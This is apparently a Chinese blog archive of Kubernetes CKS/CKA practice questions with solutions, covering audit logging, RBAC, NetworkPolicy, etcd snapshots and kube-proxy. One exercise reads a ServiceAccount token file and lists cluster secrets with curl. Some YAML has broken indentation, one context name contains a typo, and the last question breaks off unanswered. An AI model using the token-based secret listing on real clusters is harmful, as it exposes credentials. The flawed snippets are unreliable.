编辑和扩展基本策略以记录：

RequestResponse 级别的 persistentvolumes 更改
namespace front-apps 中 configmaps 更改的请求体
Metadata 级别的所有 namespace 中的 ConfigMap 和 Secret 的更改

此外，添加一个全方位的规则以在 Metadata 级别记录所有其他请求。

注意：不要忘记应用修改后的策略。

参考

https://kubernetes.io/zh/docs/tasks/debug/debug-cluster/audit/

解答

日志审计这一题需要自己调整的内容还是挺多的，因此要非常仔细，建议修改前备份一下原始的环境，要不然修改错了就会导致集群崩溃。

切换集群

kubectl config use-context KSCH00601

切换到Master的root下

ssh master01
sudo -i

配置审计策略

先备份配置文件

cp /etc/kubernetes/logpolicy/sample-policy.yaml bak/
vim /etc/kubernetes/logpolicy/sample-policy.yaml

不要删除原有规则, 可以在下面继续追加题目要求的规则

- level: RequestResponse
  resources:
  - group: ""
    resources: ["persistentvolumes"] #根据题目要求修改，比如题目要求的是namespaces。

- level: Request
  resources:
  - group: ""
    resources: ["configmaps"] #根据题目要求修改，比如题目要求的是persistentvolumes或者pods。
  namespaces: ["front-apps"]

- level: Metadata
  resources:
  - group: ""
    resources: ["secrets", "configmaps"]

- level: Metadata
  omitStages:
    - "RequestReceived"

配置 master 节点的kube-apiserver.yaml

cp /etc/kubernetes/manifests/kube-apiserver.yaml bakyaml/
vi /etc/kubernetes/manifests/kube-apiserver.yaml

添加以下参数：注意空格要对齐，不建议放到最后，建议按照下图的位置放这四条信息。

定义审计策略yaml文件位置，通过hostpath挂载

- --audit-policy-file=/etc/kubernetes/logpolicy/sample-policy.yaml #主意检查，如果考试中已经存在了，则不要重复添加。
#定义审计日志位置，通过hostpath挂载
- --audit-log-path=/var/log/kubernetes/audit-logs.txt #主意检查，如果考试中已经存在了，则不要重复添加。
#定义保留旧审计日志文件的最大天数为10天
- --audit-log-maxage=10 #主意检查，如果考试中已经存在了，则不要重复添加。
#定义要保留的审计日志文件的最大数量为2个
- --audit-log-maxbackup=2 #主意检查，如果考试中已经存在了，则不要重复添加。

volumeMounts: #找到这个字段，添加下面内容
- mountPath: /etc/kubernetes/logpolicy/sample-policy.yaml #这里也可以写到目录/etc/kubernetes/logpolicy/
  name: audit #注意，在1.25考试中，蓝色的内容已经默认有了，你只需要添加绿色字体的内容。可以通过红色字，在文件中定位。但模拟环境没有加，需要你全部手动添加。这样是为了练习，万一考试中没有，你也会加。但是如果考试中已添加，你再添加一遍，则会报错，导致api-server启不起来。
  readOnly: true #这个为true
- mountPath: /var/log/kubernetes/
  name: audit-log #注意，在1.25考试中，蓝色的内容已经有了，你只需要添加绿色字体的内容。可以通过红色字，在文件中定位。但模拟环境没有加，需要你全部手动添加。这样是为了练习，万一考试中没有，你也会加。
  readOnly: false #这个为false

volumes: #找到这个字段，添加下面内容 #注意，在1.25考试中，蓝色的内容已经有了，volumes这段无需修改，但是为了以防万一，模拟环境中没有加，需要你手动添加。这样是为了练习，万一考试中没有，你也会加。
- name: audit
  hostPath:
  path: /etc/kubernetes/logpolicy/sample-policy.yaml #这里如果写到目录/etc/kubernetes/logpolicy/，则下面的type:应为type: DirectoryOrCreate
  type: File
- name: audit-log
  hostPath:
  path: /var/log/kubernetes/
  type: DirectoryOrCreate

重启kubelet服务, 等待2分钟后，再检查

systemctl restart kubelet
kubectl get pod -A
tail /var/log/kubernetes/audit-logs.txt

log-audit-1

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 4、RBAC - RoleBinding /archives/kubernetes/CKS/RBAC-RoleBinding.html RBAC-RoleBinding-0

Context

绑定到 Pod 的 ServiceAccount 的 Role 授予过度宽松的权限。完成以下项目以减少权限集。

Task

一个名为 web-pod 的现有 Pod 已在 namespace db 中运行。编辑绑定到 Pod 的 ServiceAccount service-account-web 的现有 Role，仅允许只对 services 类型的资源执行 get 操作。在 namespace db 中创建一个名为 role-2 ，并仅允许只对 namespaces 类型的资源执行 delete 操作的新 Role。创建一个名为 role-2-binding 的新 RoleBinding，将新创建的 Role 绑定到 Pod 的 ServiceAccount。

注意：请勿删除现有的 RoleBinding。

参考

https://kubernetes.io/zh/docs/reference/access-authn-authz/rbac/#role-and-clusterole

https://kubernetes.io/zh-cn/docs/reference/access-authn-authz/rbac/#一些命令行工具

解答

切换集群

kubectl config use-context KSCH00201

查看 ServiceAccount rolebinding 对应关系

kubectl -n db describe rolebindings

编辑 role-1 权限

kubectl -n db edit role role-1

添加如下

rules:
- apiGroups:
  - ""
  resources:
  - services
  verbs:
  - get

RBAC-RoleBinding-1

检查

kubectl -n db describe role role-1

RBAC-RoleBinding-2

在db命名空间，创建名为role-2的role，并且通过rolebinding绑定service-account-web，只允许对namespaces做delete操作。

记住 --verb是权限，可能考delete或者update等 --resource是对象，可能考namespaces或者persistentvolumeclaims等。

kubectl -n db create role role-2 --verb=delete --resource=namespaces
kubectl -n db create rolebinding role-2-binding --role=role-2 --serviceaccount=db:service-account-web

检查

kubectl -n db describe rolebindings

RBAC-RoleBinding-3

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 3、默认网络策略 /archives/kubernetes/CKS/NetworkPolicy.html NetworkPolicy-0

Context

一个默认拒绝（default-deny）的NetworkPolicy可避免在未定义任何其他NetworkPolicy的namespace中意外公开Pod。

Task

为所有类型为 Ingress+Egress 的流量在 namespace testing 中创建一个名为 denypolicy 的新默认拒绝 NetworkPolicy 。此新的 NetworkPolicy 必须拒绝 namespace testing 中的所有的 Ingress + Egress 流量。将新创建的默认拒绝 NetworkPolicy 应用在 namespace testing 中运行的所有 Pod 。

你可以在 /cks/net/p1.yaml 找到一个模板清单文件。

参考

https://kubernetes.io/zh-cn/docs/concepts/services-networking/network-policies/#默认拒绝所有入口和所有出站流量

解答

切换集群

kubectl config use-context KSCS00101

编辑模板文件 /cks/net/p1.yaml

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: denypolicy     #注意修改name
  namespace: testing   #添加namespace
spec:
  podSelector: {}
  policyTypes:
  - Ingress            #注意看题，是Ingress + Egress（入口+出口），还是只是Ingress或只是Egress。
  - Egress             #在1.25的考试中，只要求拒绝所有Egress流量，那就只写这这个- Egress即可，这种情况就不要写- Ingress了。

创建并检查

kubectl -f /cks/net/p1.yaml create
kubectl -n testing describe networkpolicies denypolicy

NetworkPolicy-1
NetworkPolicy-2

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 2、Pod指定ServiceAccount /archives/kubernetes/CKS/ServiceAccount.html ServiceAccount-0

Context

您组织的安全策略包括：

ServiceAccount不得自动挂载API凭据
ServiceAccount名称必须以“-sa”结尾

清单文件 /cks/sa/pod1.yaml 中指定的Pod由于 ServiceAccount 指定错误而无法调度。

请完成以下项目：

Task

在现有namespace qa 中创建一个名为 backend-sa 的新ServiceAccount，确保此ServiceAccount不自动挂载API凭据。
使用 /cks/sa/pod1.yaml 中的清单文件来创建一个Pod。
最后，清理 namespace qa 中任何未使用的 ServiceAccount。

参考

https://kubernetes.io/zh-cn/docs/tasks/configure-pod-container/configure-service-account/#使用默认的服务账户访问-api-服务器

解答

切换集群

kubectl config use-context KSCH00301

创建 ServiceAccount

vi qa-sa.yaml

qa-sa.yaml

apiVersion: v1
kind: ServiceAccount
metadata:
  name: backend-sa  #修改为 对应的name
  namespace: qa     #namespace名称
automountServiceAccountToken: false  #false为不自动挂载secret

应用并检查

kubectl -f qa-sa.yaml create
kubectl -n qa get sa

ServiceAccount-1

使用该SA创建 pod

vim /cks/sa/pod1.yaml

……
metadata:
  name: backend
  namespace: qa #注意命名空间是否对
spec:
  serviceAccountName: backend-sa # 没有则添加一行，有则修改这一行为刚才创建的ServiceAccount（考试时，默认已有这一行，需要修改。）
containers:
……

ServiceAccount-2

删除未使用的 ServiceAccount

查看所有 SA

kubectl -n qa get sa

过滤已经在用的 SA

kubectl -n qa get pod -o yaml | grep -i serviceAccountName

删除不用的sa

kubectl -n qa delete sa test01

ServiceAccount-3

]]> kubernetes CKS K8s Killer.sh CKS CKS 题库 1、kube-bench 修复不安全项 /archives/kubernetes/CKS/kube-bench.html kube-bench-0

Context

针对 kubeadm创建的 cluster运行CIS基准测试工具时，发现了多个必须立即解决的问题。

Task

通过配置修复所有问题并重新启动受影响的组件以确保新的设置生效。

修复针对 API 服务器发现的所有以下违规行为：
1.2.7 Ensure that the –authorization-mode argument is not set to AlwaysAllow FAIL
1.2.8 Ensure that the –authorization-mode argument includes Node FAIL
1.2.9 Ensure that the –authorization-mode argument includes RBAC FAIL
1.2.18 Ensure that the –insecure-bind-address argument is not set FAIL 1.25中这项题目没给出，但最好也检查一下，模拟环境里需要改）
1.2.19 Ensure that the –insecure-port argument is set to 0 FAIL （1.25中这项题目没给出，不需要再修改了）

修复针对kubelet发现的所有以下违规行为：
Fix all of the following violations that were found against the kubelet:
4.2.1 Ensure that the anonymous-auth argument is set to false FAIL
4.2.2 Ensure that the –authorization-mode argument is not set to AlwaysAllow FAIL
注意：尽可能使用 Webhook 身份验证/授权。

修复针对etcd发现的所有以下违规行为：
Fix all of the following violations that were found against etcd:
2.2 Ensure that the –client-cert-auth argument is set to true FAIL

参考

https://kubernetes.io/zh/docs/reference/config-api/kubelet-config.v1beta1/

解答

切换集群

kubectl config use-context KSCS00201

1. 修改api-server

kube-bench master

检查FAIL项,并根据题目要求进行修改

备份文件 /etc/kubernetes/manifests/kube-apiserver.yaml 修改文件内容

- --authorization-mode=Node,RBAC  #修改参数为Node,RBAC
- --insecure-bind-address=0.0.0.0 #删除这一行 #

2. 修改kubelet

kube-bench node

检查FAIL项,并根据题目修改对应项

systemctl status kubelet

kube-bench-1

cat /etc/systemd/system/kubelet.service.d/10-kubeadm.conf 中你也会看到Environment="KUBELET_CONFIG_ARGS=--config= /var/lib/kubelet/config.yaml"。所以去修改这个文件修改之前，备份一下配置文件。

vim /var/lib/kubelet/config.yaml

kube-bench-2

重载配置重启kubelet服务

systemctl daemon-reload
systemctl restart kubelet.service

3. 修改 etcd

kube-bench

备份文件 /etc/kubernetes/manifests/etcd.yaml

修改

- --client-cert-auth=true #修改为true

做完以后要检查一下 apiserver 运行正常

]]> kubernetes CKS K8s Killer.sh CKS CKA 模拟真题 Killer.sh Extra | Question 2 | Curl Manually Contact API /archives/kubernetes/CKA/curl-api.html Use context: kubectl config use-context k8s-c1-H

There is an existing ServiceAccount secret-reader in Namespace project-hamster . Create a Pod of image curlimages/curl:7.65.3 named tmp-api-contact which uses this ServiceAccount. Make sure the container keeps running.

Exec into the Pod and use curl to access the Kubernetes Api of that cluster manually, listing all available secrets. You can ignore insecure https connection. Write the command(s) for this into file /opt/course/e4/list-secrets.sh .

译文

在namepace project-hamster 中有一个现有的ServiceAccount secret-reader 。创建一个名为 tmp-api-contact 的pod, 镜像为 curl:7.65.3 ，使用这个ServiceAccount。确保该容器持续运行。

在pod中,使用 curl 手动访问该集群的 Kubernetes Api，列出所有可用的 secret 。你可以忽略不安全的 HTTPS 连接。把这个命令写进文件 /opt/course/e4/list-secrets.sh 。

解答

参考: https://kubernetes.io/docs/tasks/run-application/access-api-from-pod

kubectl config use-context k8s-c1-H

创建pod

k run tmp-api-contact \
  --image=curlimages/curl:7.65.3 $do \
  --command -- sh -c 'sleep 1d' > e2.yaml

vim e2.yaml

e2.yaml

# e2.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: tmp-api-contact
  name: tmp-api-contact
  namespace: project-hamster          # add
spec:
  serviceAccountName: secret-reader   # add
  containers:
  - command:
    - sh
    - -c
    - sleep 1d
    image: curlimages/curl:7.65.3
    name: tmp-api-contact
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}

运行pod

k -f e2.yaml create

检查是否可以获取secret

k auth can-i get secret --as system:serviceaccount:project-hamster:secret-reader

进入pod,可以通过如下命令访问, -k参数是忽略证书认证

k -n project-hamster exec tmp-api-contact -it -- sh
~ curl https://kubernetes.default
~ curl -k https://kubernetes.default
~ curl -k https://kubernetes.default/api/v1/secrets

使用带验证头的方式进行访问

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k https://kubernetes.default/api/v1/secrets -H "Authorization: Bearer ${TOKEN}"

可以使用ca证书进行访问,不用-k参数

CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
curl --cacert ${CACERT} https://kubernetes.default/api/v1/secrets -H "Authorization: Bearer ${TOKEN}"

上面的命令可以写入文件 /opt/course/e4/list-secrets.sh

# /opt/course/e4/list-secrets.sh
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k https://kubernetes.default/api/v1/secrets -H "Authorization: Bearer ${TOKEN}"

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Extra Question 1 | Find Pods first to be terminated /archives/kubernetes/CKA/check-pods.html Use context: kubectl config use-context k8s-c1-H

Check all available Pods in the Namespace project-c13 and find the names of those that would probably be terminated first if the nodes run out of resources (cpu or memory) to schedule all Pods. Write the Pod names into /opt/course/e1/pods-not-stable.txt .

译文

检查名称空间 project-c13 中的所有可用 Pod，并找出在节点资源（CPU 或内存）耗尽时可能首先终止的 Pod 名称，以调度所有 Pod。将 Pod 名称写入 /opt/course/e1/pods-not-stable.txt。

解答

当节点上的可用cpu或内存资源达到极限时，Kubernetes将寻找那些使用的资源超过其要求的Pod。这些将是第一批终止的候选者。如果一些Pods容器没有设置资源请求/限制，那么默认情况下，这些容器将被视为使用超过请求。
参考
https://kubernetes.io/docs/tasks/configure-pod-container/quality-service-pod

kubectl config use-context k8s-c1-Hg

检查没有设置资源限制的pod

k -n project-c13 describe pod | egrep "^(Name:|    Requests:)" -A1

后面没有限制的pod有下面这些,写入到文件/opt/course/e1/pods-not-stable.txt即可

# /opt/course/e1/pods-not-stable.txt
c13-3cc-runner-heavy-65588d7d6-djtv9map
c13-3cc-runner-heavy-65588d7d6-v8kf5map
c13-3cc-runner-heavy-65588d7d6-wwpb4map
o3db-0
o3db-1 # maybe not existing if already removed via previous scenario

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Preview Question 3 /archives/kubernetes/CKA/check-ip.html Use context: kubectl config use-context k8s-c2-AC

Create a Pod named check-ip in Namespace default using image httpd:2.4.41-alpine . Expose it on port 80 as a ClusterIP Service named check-ip-service . Remember/output the IP of that Service.

Change the Service CIDR to 11.96.0.0/12 for the cluster.

Then create a second Service named check-ip-service2 pointing to the same Pod to check if your settings did take effect. Finally check if the IP of the first Service has changed.

译文

在命名空间default创建一个名为 check-ip 的Pod, 镜像使用 httpd:2.4.41-alpine 。将其作为一个名为 check-ip-service 的ClusterIP服务暴露在80端口。记住/output该服务的IP。

将集群的CIDR更改为 11.96.0.0/12 。

然后创建第二个名为 check-ip-service2 的服务，指向同一个Pod，检查你的设置是否生效。最后检查第一个服务的IP是否有变化。

解答

kubectl config use-context k8s-c2-AC

创建一个pod,并且暴露端口

k run check-ip --image=httpd:2.4.41-alpine

k expose pod check-ip --name check-ip-service --port 80

检查pod和service的IP

k get svc,ep -l run=check-ip

更改service的CIDR

ssh cluster2-controlplane1

root@cluster2-controlplane1:~# vim /etc/kubernetes/manifests/kube-apiserver.yaml

kube-apiserver.yaml

# /etc/kubernetes/manifests/kube-apiserver.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    component: kube-apiserver
    tier: control-plane
  name: kube-apiserver
  namespace: kube-system
spec:
  containers:
  - command:
    - kube-apiserver
    - --advertise-address=192.168.100.21
...
    - --service-account-key-file=/etc/kubernetes/pki/sa.pub
    - --service-cluster-ip-range=11.96.0.0/12             # change
    - --tls-cert-file=/etc/kubernetes/pki/apiserver.crt
    - --tls-private-key-file=/etc/kubernetes/pki/apiserver.key

编辑调度器配置文件

root@cluster2-controlplane1:~# vim /etc/kubernetes/manifests/kube-controller-manager.yaml

kube-controller-manager.yaml

# /etc/kubernetes/manifests/kube-controller-manager.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    component: kube-controller-manager
    tier: control-plane
  name: kube-controller-manager
  namespace: kube-system
spec:
  containers:
  - command:
    - kube-controller-manager
    - --allocate-node-cidrs=true
    - --authentication-kubeconfig=/etc/kubernetes/controller-manager.conf
    - --authorization-kubeconfig=/etc/kubernetes/controller-manager.conf
    - --bind-address=127.0.0.1
    - --client-ca-file=/etc/kubernetes/pki/ca.crt
    - --cluster-cidr=10.244.0.0/16
    - --cluster-name=kubernetes
    - --cluster-signing-cert-file=/etc/kubernetes/pki/ca.crt
    - --cluster-signing-key-file=/etc/kubernetes/pki/ca.key
    - --controllers=*,bootstrapsigner,tokencleaner
    - --kubeconfig=/etc/kubernetes/controller-manager.conf
    - --leader-elect=true
    - --node-cidr-mask-size=24
    - --requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt
    - --root-ca-file=/etc/kubernetes/pki/ca.crt
    - --service-account-private-key-file=/etc/kubernetes/pki/sa.key
    - --service-cluster-ip-range=11.96.0.0/12         # change
    - --use-service-account-credentials=true

使用crictl检查api-server和调度器是否重启

root@cluster2-controlplane1:~# crictl ps | grep scheduler

检查已存在的pod和service的IP,发现没有发生变化

k get pod,svc -l run=check-ip

check-ip-0

创建第二个pod,并检查,发现IP已经改变

k expose pod check-ip --name check-ip-service2 --port 80
k get svc,ep -l run=check-ip

check-ip-1

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Preview Question 2 /archives/kubernetes/CKA/kube-proxy.html Use context: kubectl config use-context k8s-c1-H

You’re asked to confirm that kube-proxy is running correctly on all nodes. For this perform the following in Namespace project-hamster :

Create a new Pod named p2-pod with two containers, one of image nginx:1.21.3-alpine and one of image busybox:1.31 . Make sure the busybox container keeps running for some time.

Create a new Service named p2-service which exposes that Pod internally in the cluster on port 3000->80.

Find the kube-proxy container on all nodes cluster1-controlplane1 , cluster1-node1 and cluster1-node2 and make sure that it’s using iptables. Use command crictl for this.

Write the iptables rules of all nodes belonging the created Service p2-service into file /opt/course/p2/iptables.txt .

Finally delete the Service and confirm that the iptables rules are gone from all nodes.

译文

你被要求确认 kube-proxy 在所有节点上都正确运行。为此，在名称空间 project-hamster 中执行以下操作。

创建一个名为 p2-pod 的新Pod，有两个容器，一个是 nginx:1.21.3-alpine 的镜像，一个是 busybox:1.31 的镜像。确保busybox容器持续运行一段时间。

创建一个名为 p2-service 的新服务，在集群中通过 3000->80 端口向内部公开该Pod。

在所有节点 cluster1-controlplane1 、cluster1-node1 和 cluster1-node2 上找到 kube-proxy 容器，并确保它正在使用iptables。为此使用 crictl 命令。

把属于已创建的服务 p2-service 的所有节点的iptables规则写进文件 /opt/course/p2/iptables.txt 。

最后删除该服务，并确认所有节点的iptables规则已经消失。

解答

kubectl config use-context k8s-c1-H

创建一个pod

k run p2-pod --image=nginx:1.21.3-alpine $do > p2.yaml

vim p2.yaml

p2.yaml

# p2.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    run: p2-pod
  name: p2-pod
  namespace: project-hamster             # add
spec:
  containers:
  - image: nginx:1.21.3-alpine
    name: p2-pod
  - image: busybox:1.31                  # add
    name: c2                             # add
    command: ["sh", "-c", "sleep 1d"]    # add
    resources: {}
  dnsPolicy: ClusterFirst
  restartPolicy: Always
status: {}

创建pod

k -f p2.yaml create

创建一个服务

k -n project-hamster expose pod p2-pod --name p2-service --port 3000 --target-port 80

服务的yaml文件类似如下

apiVersion: v1
kind: Service
metadata:
  creationTimestamp: "2020-04-30T20:58:14Z"
  labels:
    run: p2-pod
  managedFields:
...
    operation: Update
    time: "2020-04-30T20:58:14Z"
  name: p2-service
  namespace: project-hamster
  resourceVersion: "11071"
  selfLink: /api/v1/namespaces/project-hamster/services/p2-service
  uid: 2a1c0842-7fb6-4e94-8cdb-1602a3b1e7d2
spec:
  clusterIP: 10.97.45.18
  ports:
  - port: 3000
    protocol: TCP
    targetPort: 80
  selector:
    run: p2-pod
  sessionAffinity: None
  type: ClusterIP
status:
  loadBalancer: {}

检查svc,pod,ep

k -n project-hamster get pod,svc,ep

确认kube-proxy 正在运行且使用iptables

ssh cluster1-controlplane1
root@cluster1-controlplane1$ crictl ps | grep kube-proxy
root@cluster1-controlplane1~# crictl logs 27b6a18c0f89c

kube-proxy-0

检查kube-proxy 创建了iptables规则

ssh cluster1-controlplane1 iptables-save | grep p2-service
ssh cluster1-node1 iptables-save | grep p2-service
ssh cluster1-node2 iptables-save | grep p2-service

写日志到文件

ssh cluster1-controlplane1 iptables-save | grep p2-service >> /opt/course/p2/iptables.txt
ssh cluster1-node1 iptables-save | grep p2-service >> /opt/course/p2/iptables.txt
ssh cluster1-node2 iptables-save | grep p2-service >> /opt/course/p2/iptables.txt

删除服务后检查iptables规则

k -n project-hamster delete svc p2-service

ssh cluster1-controlplane1 iptables-save | grep p2-service
ssh cluster1-node1 iptables-save | grep p2-service
ssh cluster1-node2 iptables-save | grep p2-service

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Preview Question 1 /archives/kubernetes/CKA/etcd-cert.html Use context: kubectl config use-context k8s-c2-AC

The cluster admin asked you to find out the following information about etcd running on cluster2-controlplane1:

Server private key location Server certificate expiration date Is client certificate authentication enabled Write these information into /opt/course/p1/etcd-info.txt

Finally you’re asked to save an etcd snapshot at /etc/etcd-snapshot.db on cluster2-controlplane1 and display its status.

译文

集群管理员要求你找出关于在 cluster2-controlplane1 上运行的 etcd 的以下信息。

服务器私钥位置
服务器证书的到期日
是否启用了客户证书认证

将这些信息写入 /opt/course/p1/etcd-info.txt 中

最后要求你在 /etc/etcd-snapshot.db 上保存 cluster2-controlplane1 的 etcd 快照，并显示其状态。

解答

kubectl config use-context k8s-c2-AC

检查节点

k get node

etcd-cert-0

远程cluster2-controlplane1

ssh cluster2-controlplane1
root@cluster2-controlplane1:~# kubectl -n kube-system get pod
root@cluster2-controlplane1:~# find /etc/kubernetes/manifests/
root@cluster2-controlplane1:~# vim /etc/kubernetes/manifests/etcd.yaml

etcd-cert-1

etcd.yaml

# /etc/kubernetes/manifests/etcd.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    component: etcd
    tier: control-plane
  name: etcd
  namespace: kube-system
spec:
  containers:
  - command:
    - etcd
    - --advertise-client-urls=https://192.168.102.11:2379
    - --cert-file=/etc/kubernetes/pki/etcd/server.crt              # server certificate
    - --client-cert-auth=true                                      # enabled
    - --data-dir=/var/lib/etcd
    - --initial-advertise-peer-urls=https://192.168.102.11:2380
    - --initial-cluster=cluster2-controlplane1=https://192.168.102.11:2380
    - --key-file=/etc/kubernetes/pki/etcd/server.key               # server private key
    - --listen-client-urls=https://127.0.0.1:2379,https://192.168.102.11:2379
    - --listen-metrics-urls=http://127.0.0.1:2381
    - --listen-peer-urls=https://192.168.102.11:2380
    - --name=cluster2-controlplane1
    - --peer-cert-file=/etc/kubernetes/pki/etcd/peer.crt
    - --peer-client-cert-auth=true
    - --peer-key-file=/etc/kubernetes/pki/etcd/peer.key
    - --peer-trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
    - --snapshot-count=10000
    - --trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt

查看证书过期时间

root@cluster2-controlplane1:~# openssl x509  -noout -text -in /etc/kubernetes/pki/etcd/server.crt | grep Validity -A2

etcd-cert-2

/opt/course/p1/etcd-info.txt 内容

Server private key location: /etc/kubernetes/pki/etcd/server.key
Server certificate expiration date: Sep 13 13:01:31 2022 GMT
Is client certificate authentication enabled: yes

创建etcd备份

ETCDCTL_API=3 etcdctl snapshot save /etc/etcd-snapshot.db \
--cacert /etc/kubernetes/pki/etcd/ca.crt \
--cert /etc/kubernetes/pki/etcd/server.crt \
--key /etc/kubernetes/pki/etcd/server.key

查看备份状态

root@cluster2-controlplane1:~# ETCDCTL_API=3 etcdctl snapshot status /etc/etcd-snapshot.db

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 25 | Etcd Snapshot Save and Restore /archives/kubernetes/CKA/etcd-back-and-restore.html Task weight: 8%

Use context: kubectl config use-context k8s-c3-CCC

Make a backup of etcd running on cluster3-controlplane1 and save it on the controlplane node at /tmp/etcd-backup.db .

Then create a Pod of your kind in the cluster.

Finally restore the backup, confirm the cluster is still working and that the created Pod is no longer with us.

译文

备份运行在 cluster3-controlplane1 上的 etcd，并将其保存在 controlplane 节点上的 /tmp/etcd-backup.db 中。

然后在集群中创建一个 Pod。

最后还原备份，确认集群仍在运行，且创建的 Pod 已不复存在。

解答

kubectl config use-context k8s-c3-CCC

远程连接cluster3-controlplane1后检查etcd配置文件,查找证书文件等

ssh cluster3-controlplane1
root@cluster3-controlplane1:~# cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep etcd

etcd-back-and-restore-0

备份etcd

root@cluster3-controlplane1:~# ETCDCTL_API=3 etcdctl snapshot save /tmp/etcd-backup.db \
--endpoints https://127.0.0.1:2379 \
--cacert /etc/kubernetes/pki/etcd/ca.crt \
--cert /etc/kubernetes/pki/etcd/server.crt \
--key /etc/kubernetes/pki/etcd/server.key

恢复etcd

创建pod

root@cluster3-controlplane1:~# kubectl run test --image=nginx
root@cluster3-controlplane1:~# kubectl get pod -l run=test -w

停止所有控制面板组件

root@cluster3-controlplane1:~# cd /etc/kubernetes/manifests/

root@cluster3-controlplane1:/etc/kubernetes/manifests# mv * ..

恢复etcd

root@cluster3-controlplane1:~# ETCDCTL_API=3 etcdctl snapshot restore /tmp/etcd-backup.db \
--endpoints https://127.0.0.1:2379 \
--data-dir /var/lib/etcd-backup \
--cacert /etc/kubernetes/pki/etcd/ca.crt \
--cert /etc/kubernetes/pki/etcd/server.crt \
--key /etc/kubernetes/pki/etcd/server.key

编辑etcd文件

root@cluster3-controlplane1:~# vim /etc/kubernetes/etcd.yaml

etcd.yaml

# /etc/kubernetes/etcd.yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: null
  labels:
    component: etcd
    tier: control-plane
  name: etcd
  namespace: kube-system
spec:
...
    - mountPath: /etc/kubernetes/pki/etcd
      name: etcd-certs
  hostNetwork: true
  priorityClassName: system-cluster-critical
  volumes:
  - hostPath:
      path: /etc/kubernetes/pki/etcd
      type: DirectoryOrCreate
    name: etcd-certs
  - hostPath:
      path: /var/lib/etcd-backup                # change
      type: DirectoryOrCreate
    name: etcd-data
status: {}

恢复yaml文件,并检查容器和pod

root@cluster3-controlplane1:/etc/kubernetes/manifests# mv ../*.yaml .

root@cluster3-controlplane1:/etc/kubernetes/manifests# watch crictl ps
root@cluster3-controlplane1:~# kubectl get pod -l run=test

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 24 | NetworkPolicy /archives/kubernetes/CKA/NetworkPolicy-1.html Task weight: 9%

Use context: kubectl config use-context k8s-c1-H

There was a security incident where an intruder was able to access the whole cluster from a single hacked backend Pod.

To prevent this create a NetworkPolicy called np-backend in Namespace project-snake . It should allow the backend-* Pods only to:

connect to db1-* Pods on port 1111 connect to db2-* Pods on port 2222 Use the app label of Pods in your policy.

After implementation, connections from backend-* Pods to vault-* Pods on port 3333 should for example no longer work.

译文

曾经发生过一起安全事件，一个入侵者能够从一个被入侵的后端Pod访问整个集群。

为了防止这种情况，在 namespace project-snake 中创建一个名为 np-backend 的 NetworkPolicy。它应该只允许 backend-* Pods进入。

连接到1111端口的db1-* Pods
连接到2222端口的db2-* Pods。

在你的策略中使用Pods的 app 标签。

实施后，例如，从 backend-Pods到3333端口的 vault- Pods的连接应该不再工作。

解答

kubectl config use-context k8s-c1-H

查看pod详情

k -n project-snake get pod
k -n project-snake get pod -L app
k -n project-snake get pod -o wide

k -n project-snake exec backend-0 -- curl -s 10.44.0.25:1111
k -n project-snake exec backend-0 -- curl -s 10.44.0.23:2222
k -n project-snake exec backend-0 -- curl -s 10.44.0.22:3333

NetworkPolicy-1-0

vim 24.yaml

24.yaml

# 24_np.yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: np-backend
  namespace: project-snake
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
    - Egress                    # policy is only about Egress
  egress:
    -                           # first rule
      to:                           # first condition "to"
      - podSelector:
          matchLabels:
            app: db1
      ports:                        # second condition "port"
      - protocol: TCP
        port: 1111
    -                           # second rule
      to:                           # first condition "to"
      - podSelector:
          matchLabels:
            app: db2
      ports:                        # second condition "port"
      - protocol: TCP
        port: 2222

创建networpolicy

k -f 24.yaml create

验证测试

k -n project-snake exec backend-0 -- curl -s 10.44.0.25:1111
k -n project-snake exec backend-0 -- curl -s 10.44.0.23:2222
k -n project-snake exec backend-0 -- curl -s 10.44.0.22:3333

NetworkPolicy-1-1

]]> kubernetes CKA CKA K8s Killer.sh CKA 模拟真题 Killer.sh | Question 23 | Kubelet client/server cert info /archives/kubernetes/CKA/cluster-cert-info.html Task weight: 2%

Use context: kubectl config use-context k8s-c2-AC

Node cluster2-node1 has been added to the cluster using kubeadm and TLS bootstrapping.

Find the “Issuer” and “Extended Key Usage” values of the cluster2-node1:

kubelet client certificate, the one used for outgoing connections to the kube-apiserver. kubelet server certificate, the one used for incoming connections from the kube-apiserver. Write the information into file /opt/course/23/certificate-info.txt .

Compare the “Issuer” and “Extended Key Usage” fields of both certificates and make sense of these.

译文

节点 cluster2-node1 已经使用kubeadm和TLS引导添加到集群中。

找到 cluster2-node1 的 “Issuer “和 “Extended Key Usage “值。

kubelet客户端证书，用于向外连接kube-apiserver。
kubelet服务器证书，用于从kube-apiserver传入的连接。
将这些信息写入文件 /opt/course/23/certificate-info.txt 。

比较两个证书的 “Issuer “和 “Extended Key Usage”字段，并理解其含义。

解答

